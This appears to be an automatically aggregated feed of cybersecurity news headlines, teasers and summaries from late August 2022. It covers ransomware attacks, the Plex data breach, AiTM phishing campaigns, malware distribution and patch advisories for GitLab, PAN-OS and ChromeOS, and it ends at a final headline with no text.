                A French hospital, the Center Hospitalier Sud Francilien (CHSF), suffered a cyberattack on Sunday and was forced to refer patients to other structures. The Center Hospitalier Sud Francilien (CHSF), a hospital southeast of Paris, has suffered a ransomware attack over the weekend. The attack disrupted the emergency services and surgeries and forced the hospital to refer patients […]

                The post France hospital Center Hospitalier Sud Francilien suffered ransomware attack appeared first on Security Affairs.

                "

                Autosummary: The announcement states that the attack does not impact the operation and security of the hospital building, and all networks remain in operation (telephone with the exception of fax, automated distribution flows, etc.). "


                Plex warns users to reset passwords after a data breach

                financial
                2022-08-24 https://www.bleepingcomputer.com/news/security/plex-warns-users-to-reset-passwords-after-a-data-breach/
                The Plex media streaming platform is sending password reset notices to many of its users in response to discovering unauthorized access to one of its databases. [...]

                Autosummary: "Even though all account passwords that could have been accessed were hashed and secured in accordance with best practices, out of an abundance of caution, we are requiring all Plex accounts to have their password reset," claims Plex's notice.


                Hackers Using Fake DDoS Protection Pages to Distribute Malware

                exploits
                2022-08-24 https://thehackernews.com/2022/08/hackers-using-fake-ddos-protection.html
                WordPress sites are being hacked to display fraudulent Cloudflare DDoS protection pages that lead to the delivery of malware such as NetSupport RAT and Raccoon Stealer. "A recent surge in JavaScript injections targeting WordPress sites has resulted in fake DDoS prevent prompts which lead victims to download remote access trojan malware," Sucuri's Ben Martin said in a write-up published last week.

                Autosummary: "The infected computer could be used to pilfer social media or banking credentials, detonate ransomware, or even entrap the victim into a nefarious 'slave' network, extort the computer owner, and violate their privacy — all depending on what the attackers decide to do with the compromised device," Martin said.


                RansomEXX claims ransomware attack on Sea-Doo, Ski-Doo maker

                exploits ransomware
                2022-08-24 https://www.bleepingcomputer.com/news/security/ransomexx-claims-ransomware-attack-on-sea-doo-ski-doo-maker/
                The RansomEXX ransomware gang is claiming responsibility for the cyberattack against Bombardier Recreational Products (BRP), disclosed by the company on August 8, 2022. [...]

                Autosummary: On August 15, 2022, BRP provided an update on the situation, saying that four manufacturing sites in Canada, Finland, the U.S., and Austria resumed production, with the rest to follow suit by the end of that week.


                Hackers use AiTM attack to monitor Microsoft 365 accounts for BEC scams

                financial
                2022-08-24 https://www.bleepingcomputer.com/news/security/hackers-use-aitm-attack-to-monitor-microsoft-365-accounts-for-bec-scams/
                A new business email compromise (BEC) campaign has been discovered combining sophisticated spear-phishing with Adversary-in-The-Middle (AiTM) tactics to hack corporate executives' Microsoft 365 accounts, even those protected by MFA. [...]

                Autosummary: Attackers adding the phone as a new MFA device (Mitiga). Because valid sessions can expire or be revoked, the threat actors add a new MFA device and link it to the breached Microsoft 365 account, a move that doesn't generate any alerts or require further interaction with the original account owner.


                AiTM phishing campaign also targets G Suite users

                financial
                2022-08-24 https://securityaffairs.co/wordpress/134796/cyber-crime/aitm-phishing-g-suite.html

                The threat actors behind a large-scale adversary-in-the-middle (AiTM) phishing campaign now target Google G Suite users. The threat actors behind a large-scale adversary-in-the-middle (AiTM) phishing campaign targeting enterprise users of Microsoft email services were spotted targeting Google G Suite users. In AiTM phishing, threat actors set up a proxy server between a target user and the website the user […]

                The post AiTM phishing campaign also targets G Suite users appeared first on Security Affairs.

                "

                Autosummary: The threat actors behind a large-scale adversary-in-the-middle (AiTM) phishing campaign now target Google G Suite users The threat actors behind a large-scale adversary-in-the-middle (AiTM) phishing campaign targeting enterprise users of Microsoft email services were spotted targeting Google G Suite users. "


                Quantum ransomware attack disrupts govt agency in Dominican Republic

                exploits ransomware
                2022-08-24 https://www.bleepingcomputer.com/news/security/quantum-ransomware-attack-disrupts-govt-agency-in-dominican-republic/
                The Dominican Republic's Instituto Agrario Dominicano has suffered a Quantum ransomware attack that encrypted multiple services and workstations throughout the government agency. [...]

                Autosummary: Quantum ransom note (Source: BleepingComputer). Quantum is becoming a major player among enterprise-targeting ransomware operations, linked to an attack on PFC that impacted over 650 healthcare orgs. The ransomware gang is believed to have become an offshoot of the Conti ransomware operation, which took over the previous rebrand of the MountLocker ransomware operation.


                GitLab ‘strongly recommends’ patching critical RCE vulnerability

                exploits
                2022-08-24 https://www.bleepingcomputer.com/news/security/gitlab-strongly-recommends-patching-critical-rce-vulnerability/
                GitLab is urging users to install a security update for branches 15.1, 15.2, and 15.3 of its community and enterprise editions to fix a critical vulnerability that could enable an attacker to perform remote command execution via GitHub import. [...]

                Autosummary: To apply the workaround, follow these steps:
                1. Log in using an administrator account to your GitLab installation.
                2. Click "Menu" -> "Admin".
                3. Click "Settings" -> "General".
                4. Expand the "Visibility and access controls" tab.
                5. Under "Import sources" disable the "GitHub" option.
                6. Click "Save changes".
                To verify that the workaround has been correctly implemented, follow these steps: In a browser window, log in as any user.


                Cloud Range RightTrak Cyber Aptitude Assessment improves cybersecurity hiring process

                ciber
                2022-08-24 https://www.helpnetsecurity.com/2022/08/25/cloud-range-righttrak-cyber-aptitude-assessment/

                Cloud Range has introduced a cognitive assessment to help security and HR leaders optimize the cybersecurity hiring process and make the right hiring choice. The Cloud Range RightTrak Cyber Aptitude Assessment is a metric-based assessment with different cognitive components that identify an individual’s cognitive aptitude for a career in cybersecurity. It matches their innate talents and abilities with their optimal cyber work role. “Unfortunately, security leaders and HR professionals are challenged by finding the right … More

                The post Cloud Range RightTrak Cyber Aptitude Assessment improves cybersecurity hiring process appeared first on Help Net Security.

                "

                Autosummary: While Gartner reports validate a skills shortage, there are many alternative mechanisms to fill this gap,” write Richard Addiscott, senior director analyst at Gartner, and Sam Olyaei, vice president and team manager at Gartner. "


                ChromeOS vulnerability found by Microsoft

                exploits
                2022-08-24 https://www.malwarebytes.com/blog/news/2022/08/chromeos-vulnerability-found-by-microsoft

                Microsoft has released a report detailing a ChromeOS vulnerability reported to Chrome and fixed within a week.

                The post ChromeOS vulnerability found by Microsoft appeared first on Malwarebytes Labs.

                "

                Autosummary: Changes to audio metadata could trigger the vulnerability in just the way they were looking for: From the browser: The browser’s media component invokes the function when metadata is changed, such as when playing a new song in the browser. A critical issue The problem, known as CVE-2022-2587 on the Common Vulnerabilities and Exposures (CVE) list, caused big headaches for Chrome. "


                Reset your password now! Plex suffers data breach

                financial
                2022-08-24 https://www.malwarebytes.com/blog/news/2022/08/reset-your-password-now-plex-suffers-data-breach

                In an email sent to its users, Plex revealed that a cybercriminal accessed a limited subset of customer data, including emails and encrypted passwords.

                The post Reset your password now! Plex suffers data breach appeared first on Malwarebytes Labs.

                "

                Autosummary: Posted: August 24, 2022 by In an email sent to its users, Plex revealed that a cybercriminal accessed a limited subset of customer data, including emails and encrypted passwords. "


                Malwarebytes partners with Revelstoke to automate endpoint detection and response

                exploits
                2022-08-24 https://www.helpnetsecurity.com/2022/08/25/malwarebytes-revelstoke/

                Malwarebytes announced a new integration with Revelstoke, the first next-generation Security Orchestration, Automation and Response (SOAR) platform. The partnership will help customers better automate and address priority vulnerabilities with the greatest potential impact to their organizations. The partnership comes at a critical time in the cybersecurity landscape, as security teams are feeling the double strain of increased threat volume and limited resources. Malwarebytes’ 2022 Threat Review documented a steep “Covid bounce” in malware volume. Revelstoke’s … More

                The post Malwarebytes partners with Revelstoke to automate endpoint detection and response appeared first on Help Net Security.

                "

                Autosummary: "


                Plex discloses data breach and urges password reset

                financial
                2022-08-24 https://securityaffairs.co/wordpress/134814/data-breach/plex-data-breach.html

                The streaming media platform Plex is urging its users to reset passwords after threat actors gained access to its database. Plex is an American streaming media service and a client–server media player platform. The company disclosed a data breach after threat actors had access to a limited subset of data stored in a compromised database. Exposed data includes emails, usernames, and […]

                The post Plex discloses data breach and urges password reset appeared first on Security Affairs.

                "

                Autosummary: Plex did share technical details about the security breach, below is the Plex data breach notification: We want you to be aware of an incident involving your Plex account information yesterday. "


                Lockbit leak sites hit by mysterious DDoS attack after Entrust hack

                ransomware
                2022-08-23 https://securityaffairs.co/wordpress/134707/cyber-crime/lockbit-hacked-entrust.html

                The LockBit ransomware gang claims to have hacked the IT giant Entrust and has started leaking the stolen files. Entrust Corp. provides software and hardware used to issue financial cards, e-passport production, user authentication for those looking to access secure networks or conduct financial transactions, trust certificates for websites, mobile credentials, and connected devices. The Lockbit ransomware […]

                The post Lockbit leak sites hit by mysterious DDoS attack after Entrust hack appeared first on Security Affairs.

                "

                Autosummary: Lockbit: "We"re being DDoS"d because of the Entrust hack" vx-underground: "How do you know it"s because of the Entrust breach?" Lockbit: pic.twitter.com/HUO2hdTbwz — vx-underground (@vxunderground) August 21, 2022 The news was confirmed by BleepingComputer who reached representatives from the group: “Ddos attack began immediately after the publication of data and negotiations, of course it was them, who else needs it? "


                7 open-source malware analysis tools you should try out

                exploits
                2022-08-23 https://www.helpnetsecurity.com/2022/08/23/7-open-source-malware-analysis-tools-you-should-try-out/

                There are two main types of malware analysis: static and dynamic. Performing static analysis of a malicious binary means concentrating on analyzing its code without executing it. This type of analysis may reveal to malware analysts not only what the malware does, but also its developer’s future intentions (e.g., currently unfinished functionalities). Dynamic analysis looks at the behavior of the malware when it’s run – usually in a virtual sandbox. This type of analysis should … More

                The post 7 open-source malware analysis tools you should try out appeared first on Help Net Security.

                "

                Autosummary: Mobile Security Framework (MobSF) MobSF is an automated, all-in-one mobile application (Android/iOS/Windows) pen-testing, malware analysis, and security assessment framework capable of performing static and dynamic analysis.Capabilities include disassembly, assembly, decompilation, graphing, and scripting, along with hundreds of other features. "


                What businesses can do to anticipate and mitigate ransomware threats

                exploits ransomware
                2022-08-23 https://www.helpnetsecurity.com/2022/08/23/anticipate-mitigate-ransomware-threats-video/

                In this Help Net Security video, Kevin Holvoet, Cyber Threat Intelligence Instructor, SANS Institute, discusses ransomware and Ransomware as a Service (RaaS) attacks, and illustrates how preparedness with a proper top-down response is critical for business continuity in case of an attack.

                The post What businesses can do to anticipate and mitigate ransomware threats appeared first on Help Net Security.

                "

                Autosummary: "


                DDoS attacks jump 203%, patriotic hacktivism surges

                industry
                2022-08-23 https://www.helpnetsecurity.com/2022/08/23/malicious-ddos-attacks-climbed/

                Radware released a report revealing that the number of malicious DDoS attacks climbed by 203% compared to the first six months of 2021. The report also underscores how Russia’s invasion of Ukraine has altered the focus of the threat landscape — shifting it from the consequences of the pandemic to a groundswell of DDoS activity launched by patriotic hacktivists. “The threat landscape saw a marked shift in the first half of 2022,” said Pascal … More

                The post DDoS attacks jump 203%, patriotic hacktivism surges appeared first on Help Net Security.

                "

                Autosummary: Major information and communication networks in the Philippines, including CNN, news network ABS-CBN, Rappler, and VERA Files, were the target of DDoS attacks in connection with the country’s 2022 general elections. Retail and high-tech top industries for most web attacks During the first six months of 2022, there was an increase in malicious transactions targeting online applications, dominated by predictable resource location and injection attacks. "


                CISA Warns of Active Exploitation of Palo Alto Networks' PAN-OS Vulnerability

                exploits
                2022-08-23 https://thehackernews.com/2022/08/cisa-warns-of-active-exploitation-of.html
                The U.S. Cybersecurity and Infrastructure Security Agency (CISA) on Monday added a security flaw impacting Palo Alto Networks PAN-OS to its Known Exploited Vulnerabilities Catalog, based on evidence of active exploitation. The high-severity vulnerability, tracked as CVE-2022-0028 (CVSS score: 8.6), is a URL filtering policy misconfiguration that could allow an unauthenticated, remote attacker to


                Credential phishing attacks rise and represent a huge threat to businesses

                financial
                2022-08-23 https://www.helpnetsecurity.com/2022/08/23/credential-phishing-attacks-video/

                Abnormal Security released a report which explores the current email threat landscape. This Help Net Security video provides insight into the latest advanced email attack trends.

                The post Credential phishing attacks rise and represent a huge threat to businesses appeared first on Help Net Security.

                "

                Autosummary: "


                CISA adds Palo Alto Networks PAN-OS to its Known Exploited Vulnerabilities Catalog

                exploits
                2022-08-23 https://securityaffairs.co/wordpress/134749/security/palo-alto-networks-pan-os-flaw-2.html

                US Cybersecurity and Infrastructure Security Agency (CISA) added a flaw, tracked as CVE-2022-0028, affecting Palo Alto Networks PAN-OS to its Known Exploited Vulnerabilities Catalog. The U.S. Cybersecurity and Infrastructure Security Agency (CISA) has added a high-severity flaw impacting Palo Alto Networks PAN-OS to its Known Exploited Vulnerabilities Catalog, based on evidence of active exploitation. According to Binding Operational […]

                The post CISA adds Palo Alto Networks PAN-OS to its Known Exploited Vulnerabilities Catalog appeared first on Security Affairs.

                "

                Autosummary: US Cybersecurity and Infrastructure Security Agency (CISA) added a flaw, tracked as CVE-2022-0028, affecting Palo Alto Networks PAN-OS to its Known Exploited Vulnerabilities Catalog The U.S. Cybersecurity and Infrastructure Security Agency (CISA) has added a high-severity flaw impacting Palo Alto Networks PAN-OS to its Known Exploited Vulnerabilities Catalog, based on evidence of active exploitation. The issue, tracked as CVE-2022-0028 (CVSS score: 8.6), is a URL filtering policy misconfiguration that could be exploited by an unauthenticated, remote attacker to carry out reflected and amplified TCP denial-of-service (DoS) attacks. "


                The Rise of Data Exfiltration and Why It Is a Greater Risk Than Ransomware

                exploits ransomware
                2022-08-23 https://thehackernews.com/2022/08/the-rise-of-data-exfiltration-and-why.html
                Ransomware is the de facto threat organizations have faced over the past few years. Threat actors were making easy money by exploiting the high valuation of cryptocurrencies and their victims' lack of adequate preparation. Think about bad security policies, untested backups, patch management practices not up-to-par, and so forth. It resulted in easy growth for ransomware extortion, a crime that

                Autosummary: Earlier this year, incidents at Nvidia, Microsoft, and several other companies have highlighted how big of a problem it's become – and how, for some organizations, it may be a threat that's even bigger than ransomware. After so many years of alarming headlines, most organizations have deployed ransomware protection in the form of better backup strategies, more fine-tuned and granular data access, and better rules and monitoring for detecting unwanted file changes. Staying quiet, rather than flashing "you've been hacked" messages on computer screens, allows attackers to "see" more information flows in the network and to do more in-depth reconnaissance of systems after gaining entry.


                Firewall Bug Under Active Attack Triggers CISA Warning

                exploits
                2022-08-23 https://threatpost.com/firewall-bug-under-active-attack-cisa-warning/180467/
                CISA is warning that Palo Alto Networks’ PAN-OS is under active attack and needs to be patched ASAP.

                Autosummary: PAN-OS versions vulnerable to attack, with patches available, include PAN-OS prior to 10.2.2-h2, PAN-OS prior to 10.1.6-h6, PAN-OS prior to 10.0.11-h1, PAN-OS prior to 9.1.14-h4, PAN-OS prior to 9.0.16-h3 and PAN-OS prior to 8.1.23-h1. “The DoS attack would appear to originate from a Palo Alto Networks PA-Series (hardware), VM-Series (virtual) and CN-Series (container) firewall against an attacker-specified target.”


                French hospital hit by $10M ransomware attack, sends patients elsewhere

                exploits ransomware
                2022-08-23 https://www.bleepingcomputer.com/news/security/french-hospital-hit-by-10m-ransomware-attack-sends-patients-elsewhere/
                The Center Hospitalier Sud Francilien (CHSF), a 1000-bed hospital located 28km from the center of Paris, suffered a cyberattack on Sunday, which has resulted in the medical center referring patients to other establishments and postponing appointments for surgeries. [...]


                New "Donut Leaks" extortion gang linked to recent ransomware attacks

                exploits ransomware
                2022-08-23 https://www.bleepingcomputer.com/news/security/new-donut-leaks-extortion-gang-linked-to-recent-ransomware-attacks/
                A new data extortion group named "Donut Leaks" is linked to recent cyberattacks, including those on Greek natural gas company DESFA, UK architectural firm Sheppard Robson, and multinational construction company Sando. [...]

                Autosummary: Donut Leaks data leak site (Source: BleepingComputer). The stolen data storage server runs the File Browser application, which allows visitors to browse through all of the stolen data stored on the server, broken down by the victim.


                Hackers demand $10 million from Paris hospital after ransomware attack

                exploits ransomware
                2022-08-23 https://www.bitdefender.com/blog/hotforsecurity/hackers-demand-10-million-from-paris-hospital-after-ransomware-attack/
                Malicious hackers are demanding $10 million from a French hospital they hit with ransomware last weekend. The Hospital Center Sud Francilien (CHSF) in Corbeil-Essonnes, south-east of Paris, was struck late on Saturday night, causing major disruption to health services. Read more in my article on the Hot for Security blog.


                XCSSET Malware Updates with Python 3 to Target macOS Monterey Users

                exploits
                2022-08-23 https://thehackernews.com/2022/08/xcsset-malware-updates-with-python-3-to.html
                The operators of the XCSSET macOS malware have upped the stakes by making iterative improvements that add support for macOS Monterey by upgrading its source code components to Python 3. "The malware authors have changed from hiding the primary executable in a fake Xcode.app in the initial versions in 2020 to a fake Mail.app in 2021 and now to a fake Notes.app in 2022," SentinelOne researchers

                Autosummary: The threat actor is also known to use a custom AppleScript ("listing.applescript") to determine "how up-to-date the victim is with Apple's XProtect and MRT malware removal tool, presumably all the better to target them with more effective payloads," the researchers said.


                GitLab fixed a critical Remote Code Execution (RCE) bug in CE and EE releases

                exploits
                2022-08-23 https://securityaffairs.co/wordpress/134769/security/gitlab-rce-bug.html

                DevOps platform GitLab fixed a critical remote code execution flaw in its GitLab Community Edition (CE) and Enterprise Edition (EE) releases. DevOps platform GitLab has released security updates to fix a critical remote code execution vulnerability, tracked as CVE-2022-2884 (CVSS 9.9), affecting its GitLab Community Edition (CE) and Enterprise Edition (EE) releases. An authenticated attacker […]

                The post GitLab fixed a critical Remote Code Execution (RCE) bug in CE and EE releases appeared first on Security Affairs.

                "

                Autosummary: "


                Phishing attacks abusing SaaS platforms see a massive 1,100% growth

                financial
                2022-08-23 https://www.bleepingcomputer.com/news/security/phishing-attacks-abusing-saas-platforms-see-a-massive-1-100-percent-growth/
                Threat actors are increasingly abusing legitimate software-as-a-service (SaaS) platforms like website builders and personal branding spaces to create malicious phishing websites that steal login credentials. [...]

                Autosummary: In 2021, Cyren reported about the rampant abuse of "typeform.com" for phishing, an older report from Trend Micro mentioned "123formbuilder.com", "formtools.com", and "smartsurvey.co.uk", while Cofense highlighted the abuse of "Canva.com".


                Rippleshot collaborates with Flashpoint to combat card fraud for financial institutions

                financial
                2022-08-23 https://www.helpnetsecurity.com/2022/08/24/rippleshot-flashpoint/

                Rippleshot has partnered with Flashpoint to pair Rippleshot’s compromised and high-risk merchant data and insights with Flashpoint’s Payment and Credit Card Fraud Mitigation solution. Equipped with tools such as AI/ML, automation, and data-driven strategies, Rippleshot’s cloud-based solution leverages a data consortium of more than 4,500 financial institutions and is updated daily. Using Rippleshot’s detailed data and solutions, financial institutions can enhance their existing fraud prevention strategies to detect compromised cards, data breaches and high-risk merchants, … More

                The post Rippleshot collaborates with Flashpoint to combat card fraud for financial institutions appeared first on Help Net Security.

                "

                Autosummary: "


                ImmuniWeb joins Cybersecurity Tech Accord to improve cyber resilience for customers

                ciber
                2022-08-23 https://www.helpnetsecurity.com/2022/08/24/immuniweb-cybersecurity-tech-accord/

                The Cybersecurity Tech Accord is a global interindustry agreement and partnership of leading cybersecurity and technology vendors that are jointly building a better future in cyberspace. Some vendors and experts have referred to it as a nascent version of a Geneva Cybersecurity Convention. The signatories of the Tech Accord strive to protect all their customers in the best possible manner, to progressively help their customers fortify their cyber resilience and cyber defense capabilities, to shield innocent citizens … More

                The post ImmuniWeb joins Cybersecurity Tech Accord to improve cyber resilience for customers appeared first on Help Net Security.

                Autosummary: We will design, develop, and deliver products and services that prioritize security, privacy, integrity and reliability, and in turn reduce the likelihood, frequency, exploitability, and severity of vulnerabilities.


                Pirated 3DMark benchmark tool delivering info-stealer malware

                exploits
                2022-08-23 https://www.bleepingcomputer.com/news/security/pirated-3dmark-benchmark-tool-delivering-info-stealer-malware/
                Cybersecurity researchers have discovered multiple ongoing malware distribution campaigns that target internet users who seek to download copies of pirated software. [...]

                Autosummary: Malicious high-ranking search results (Zscaler). The software used for luring victims in the ongoing campaigns, according to Zscaler that discovered them, includes the following: Adobe Acrobat Pro, 3DMark, 3DVista Virtual Tour Pro, 7-Data Recovery Suite, MAGIX Sound Force Pro, Wondershare Dr. Fone.


                Disk wiping malware knows no borders

                exploits
                2022-08-22 https://www.helpnetsecurity.com/2022/08/22/ransomware-threat-more-variants/

                Fortinet announced the latest semiannual FortiGuard Labs Global Threat Landscape Report which revealed that ransomware threat continues to adapt with more variants enabled by Ransomware-as-a-Service (RaaS). Additional highlights of the report: Work-from-anywhere (WFA) endpoints remain targets for cyber adversaries to gain access to corporate networks. Operational technology (OT) and information technology (IT) environments are both attractive targets as cyber adversaries search for opportunities in the growing attack surface and IT/OT convergence. Destructive threat trends continue … More

                The post Disk wiping malware knows no borders appeared first on Help Net Security.

                Autosummary: AI and ML-powered prevention, detection, and response strategies based on a cybersecurity mesh architecture allow for much tighter integration, increased automation, as well as a more rapid, coordinated, and effective response to threats across the extended network. “To combat advanced and sophisticated attacks, organizations need integrated security solutions that can ingest real-time threat intelligence, detect threat patterns, and correlate massive amounts of data to detect anomalies and automatically initiate a coordinated response across hybrid networks.” For example, a spoofing vulnerability (CVE 2022-26925) placed high in volume, as well as a remote code execution (RCE) vulnerability (CVE 2022-26937).


                Escanor malware delivered in weaponized Microsoft Office documents

                exploits
                2022-08-22 https://www.helpnetsecurity.com/2022/08/22/escanor-malware-delivered-in-weaponized-microsoft-office-documents/

                Resecurity, a Los Angeles-based cybersecurity company protecting Fortune 500 worldwide, identified a new RAT (Remote Administration Tool) advertised in Dark Web and Telegram called Escanor. The threat actors offer Android-based and PC-based versions of RAT, along with HVNC module and exploit builder to weaponize Microsoft Office and Adobe PDF documents to deliver malicious code. The tool has been released for sale on January 26th this year initially as a compact HVNC implant allowing to set … More

                The post Escanor malware delivered in weaponized Microsoft Office documents appeared first on Help Net Security.



                Businesses expect the government to increase its financial assistance for all ransomware incidents

                financial exploits government ransomware
                2022-08-22 https://www.helpnetsecurity.com/2022/08/22/ransomware-demands-videos/

                Businesses are increasingly concerned about how they will meet ransomware demands. Only 19 percent of those surveyed have ransomware coverage limits above $600,000, while over half (59 percent) hoped the government would cover damages when future attacks are linked to other nation-states, according to BlackBerry Limited and Corvus Insurance. This Help Net Security video uncovers why businesses look for government help with ransomware demand costs.

                The post Businesses expect the government to increase its financial assistance for all ransomware incidents appeared first on Help Net Security.



                Hackers Stole Crypto from Bitcoin ATMs by Exploiting Zero-Day Vulnerability

                financial exploits
                2022-08-22 https://thehackernews.com/2022/08/hackers-stole-crypto-from-bitcoin-atms.html
                Bitcoin ATM manufacturer General Bytes confirmed that it was a victim of a cyberattack that exploited a previously unknown flaw in its software to plunder cryptocurrency from its users. "The attacker was able to create an admin user remotely via CAS administrative interface via a URL call on the page that is used for the default installation on the server and creating the first administration "



                Escanor Malware delivered in Weaponized Microsoft Office Documents

                exploits
                2022-08-22 https://securityaffairs.co/wordpress/134697/malware/escanor-malware-ms-docs.html

                Researchers spotted a new RAT (Remote Administration Tool) advertised in Dark Web and Telegram called Escanor. Resecurity, a Los Angeles-based cybersecurity company protecting Fortune 500 worldwide, identified a new RAT (Remote Administration Tool) advertised in Dark Web and Telegram called Escanor. The threat actors offer Android-based and PC-based versions of RAT, along with HVNC module […]

                The post Escanor Malware delivered in Weaponized Microsoft Office Documents appeared first on Security Affairs.

                Autosummary: The majority of victims infected by Escanor have been identified in the U.S., Canada, UAE, Saudi Arabia, Kuwait, Bahrain, Egypt, Israel, Mexico, and Singapore with some infections in South-East Asia.


                Donot Team cyberespionage group updates its Windows malware framework

                exploits
                2022-08-22 https://securityaffairs.co/wordpress/134674/apt/donot-team-improves-jaca-framework.html

                The Donot Team threat actor, aka APT-C-35, has added new capabilities to its Jaca Windows malware framework. The Donot Team has been active since 2016; it focuses on government and military organizations, ministries of foreign affairs, and embassies in India, Pakistan, Sri Lanka, Bangladesh, and other South Asian countries. In October 2021, a report released by Amnesty International revealed that the […]

                The post Donot Team cyberespionage group updates its Windows malware framework appeared first on Security Affairs.

                Autosummary: The Donot Team has been active since 2016; it focuses on government and military organizations, ministries of foreign affairs, and embassies in India, Pakistan, Sri Lanka, Bangladesh, and other South Asian countries.


                Lockbit ransomware blames Entrust for DDoS attacks on leak sites

                exploits ransomware
                2022-08-22 https://www.bleepingcomputer.com/news/security/lockbit-ransomware-blames-entrust-for-ddos-attacks-on-leak-sites/
                The LockBit ransomware operation's data leak sites have been shut down over the weekend due to a DDoS attack telling them to remove Entrust's allegedly stolen data. [...]

                Autosummary: Alleged Entrust data leaked on LockBit's data leak site (Source: Dominic Alvieri). Soon after they started leaking data, researchers began reporting that the ransomware gang's Tor data leak sites were unavailable due to a DDoS attack. So, at this point, it is unclear if Entrust, an affiliated cybersecurity company, or simply a rival threat actor is taking advantage of the situation by conducting the attacks.


                Fake DDoS protection pages are delivering malware!

                exploits
                2022-08-22 https://www.helpnetsecurity.com/2022/08/22/fake-ddos-protection-malware/

                Malware peddlers are exploiting users’ familiarity with and inherent trust in DDoS protection pages to make them download and run malware on their computer, Sucuri researchers have warned. Hidden malware and fake DDoS protection: DDoS protection pages have become so common that users rarely think twice about doing what those pages tell them to do to get website access. This state of affairs is being exploited by clever malware peddlers. Visitors to WordPress sites that … More

                The post Fake DDoS protection pages are delivering malware! appeared first on Help Net Security.



                "As Nasty as Dirty Pipe" — 8 Year Old Linux Kernel Vulnerability Uncovered

                exploits
                2022-08-22 https://thehackernews.com/2022/08/as-nasty-as-dirty-pipe-8-year-old-linux.html
                Details of an eight-year-old security vulnerability in the Linux kernel have emerged that the researchers say is "as nasty as Dirty Pipe." Dubbed DirtyCred by a group of academics from Northwestern University, the security weakness exploits a previously unknown flaw (CVE-2022-2588) to escalate privileges to the maximum level. "DirtyCred is a kernel exploitation concept that swaps unprivileged "



                Greek natural gas operator suffers ransomware-related data breach

                financial exploits ransomware
                2022-08-22 https://www.bleepingcomputer.com/news/security/greek-natural-gas-operator-suffers-ransomware-related-data-breach/
                Greece's largest natural gas distributor DESFA confirmed on Saturday that they suffered a limited scope data breach and IT system outage following a cyberattack. [...]

                Autosummary: The upcoming winter is expected to be plagued by shortages, power cuts, rationing, and soaring energy prices, leaving consumers even more vulnerable to ransomware attacks against gas suppliers.


                European Cybersecurity in Context: A Policy-Oriented Comparative Analysis

                ciber
                2022-08-22 https://securityaffairs.co/wordpress/134731/security/european-cybersecurity-in-context.html

                I’m proud to have contributed to the “European Cybersecurity in Context: A Policy-Oriented Comparative Analysis”. Worldwide connectivity has unleashed global digitalisation, creating cross-border social networks for communicating and spreading information. The use of digital identity for democratic procedures is becoming a reality and public services are shifting towards using digital tools to implement simplified procedures. […]

                The post European Cybersecurity in Context: A Policy-Oriented Comparative Analysis appeared first on Security Affairs.



                Criminals socially engineer their way to bank details with fake arrest warrants

                financial
                2022-08-22 https://www.malwarebytes.com/blog/news/2022/08/criminals-socially-engineer-their-way-to-bank-details-with-fake-arrest-warrants

                Categories: News

                Categories: Social engineering

                Scammers subject their victims to a whirlwind of emotions so they can achieve their end goal: money.


                The post Criminals socially engineer their way to bank details with fake arrest warrants appeared first on Malwarebytes Labs.

                Autosummary: In her post, she broke down the scam into four phases, reflecting the scammers' intent in each stage: Dismay, Isolate, Overwhelm, and Intimidate. The caller, a female who was purportedly working for the Inland Revenue Board of Malaysia (IRBM), an agency responsible for collecting taxes, said that "Venus" owed at least RM50,000 ($11,000) in arrears for a business created under her name. Seems simple enough, but this process, which countries from the West have been abiding by, is the result of countless breaches in the past, followed by a myriad of digital crimes that took advantage of those leaked and stolen data.


                CISA wants you to patch these actively exploited vulnerabilities before September 8

                exploits
                2022-08-22 https://www.malwarebytes.com/blog/news/2022/08/cisa-wants-you-to-patch-these-actively-exploited-vulnerabilities-before-september-8

                Categories: Exploits and vulnerabilities

                Categories: News

                CISA updated its catalog of actively exploited vulnerabilities. Make sure you update your software before the due date!


                The post CISA wants you to patch these actively exploited vulnerabilities before September 8 appeared first on Malwarebytes Labs.

                Autosummary: CVE-2022-32893 and CVE-2022-32894, the two zero-day, out-of-bounds write vulnerabilities affecting iOS, iPadOS, and macOS, continue to headline as of this writing.


                Over 80,000 exploitable Hikvision cameras exposed online

                exploits
                2022-08-22 https://www.bleepingcomputer.com/news/security/over-80-000-exploitable-hikvision-cameras-exposed-online/
                Security researchers have discovered over 80,000 Hikvision cameras vulnerable to a critical command injection flaw that's easily exploitable via specially crafted messages sent to the vulnerable web server. [...]

                Autosummary: Most of these are located in China and the United States, while Vietnam, the UK, Ukraine, Thailand, South Africa, France, the Netherlands, and Romania all count above 2,000 vulnerable endpoints.


                Week in review: Apple fixes exploited zero-days, 1,900 Signal users exposed, Amazon Ring app vuln

                exploits
                2022-08-21 https://www.helpnetsecurity.com/2022/08/21/week-in-review-apple-fixes-exploited-zero-days-1900-signal-users-exposed-amazon-ring-app-vuln/

                Tackling the dangers of internal communications: What can companies do? In this interview for Help Net Security, Devin Redmond, CEO at Theta Lake, talks about the risk of internal communications and what companies can do to keep themselves safe. How government CISOs tackle digital transformation initiatives In this interview for Help Net Security, Dan Tucker, Senior VP at Booz Allen, and leader of the firm’s cloud and data engineering solutions for citizen services, talks about … More

                The post Week in review: Apple fixes exploited zero-days, 1,900 Signal users exposed, Amazon Ring app vuln appeared first on Help Net Security.

                Autosummary: How government CISOs tackle digital transformation initiatives: In this interview for Help Net Security, Dan Tucker, Senior VP at Booz Allen, and leader of the firm’s cloud and data engineering solutions for citizen services, talks about government digital transformation efforts, security challenges, and offers tips for CISOs. Why smart factories need to prioritize cybersecurity: In this Help Net Security video, Aarthi Krishna, Global Head of Intelligent Industry Security at Capgemini, provides an overview of the cybersecurity issues smart factories have to deal with, and offers steps to help organizations better prepare, prevent and mitigate a variety of attacks.


                Grandoreiro banking malware targets Mexico and Spain

                financial exploits latam
                2022-08-21 https://securityaffairs.co/wordpress/134651/cyber-crime/grandoreiro-targest-mexico-spain.html

                A new Grandoreiro banking malware campaign is targeting organizations in Mexico and Spain, Zscaler reported. Zscaler ThreatLabz researchers observed a Grandoreiro banking malware campaign targeting organizations in the Spanish-speaking nations of Mexico and Spain. Grandoreiro is a modular backdoor that supports the following capabilities: Keylogging Auto-Updation for newer versions and modules Web-Injects and restricting access to specific […]

                The post Grandoreiro banking malware targets Mexico and Spain appeared first on Security Affairs.

                Autosummary: Grandoreiro is a modular backdoor that supports the following capabilities: keylogging; auto-updation for newer versions and modules; web-injects and restricting access to specific websites; command execution; manipulating windows; guiding the victim’s browser to a certain URL; C2 domain generation via DGA (Domain Generation Algorithm).


                Threat actors are stealing funds from General Bytes Bitcoin ATM

                financial
                2022-08-21 https://securityaffairs.co/wordpress/134664/hacking/general-bytes-bitcoin-atm-zero-day.html

